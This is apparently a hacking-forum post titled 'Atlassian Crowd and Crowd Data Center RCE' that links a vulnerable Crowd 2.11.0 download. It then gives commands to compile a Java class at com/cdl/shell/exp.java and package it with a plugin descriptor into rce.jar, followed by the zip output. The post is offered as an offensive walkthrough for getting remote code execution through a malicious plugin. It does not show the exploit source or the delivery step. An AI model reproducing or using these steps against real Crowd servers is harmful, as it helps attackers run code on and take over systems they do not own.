View Single Post
Old 05-20-2025, 07:13 AM   #1
Pudeopie
Junior Member
 
Join Date: May 2025
Posts: 4
Default Atlassian Crowd and Crowd Data Center RCE

Crowd-2.11.0 Vuln_Version Donwload

https://product-downloads.atlassian....-2.11.0.tar.gz


0x01 compile for rce.jar
javac -cp servlet-api.jar com/cdl/shell/exp.java

zip -r rce.jar atlassian-plugin.xml ./com

./compile.sh
updating: atlassian-plugin.xml (deflated 54%)
updating: com/ (stored 0%)
updating: com/cdl/ (stored 0%)
updating: com/cdl/shell/ (stored 0%)
updating: com/cdl/shell/exp.java (deflated 59%)
updating: com/cdl/shell/exp.class (deflated 45%)
Pudeopie is offline   Reply With Quote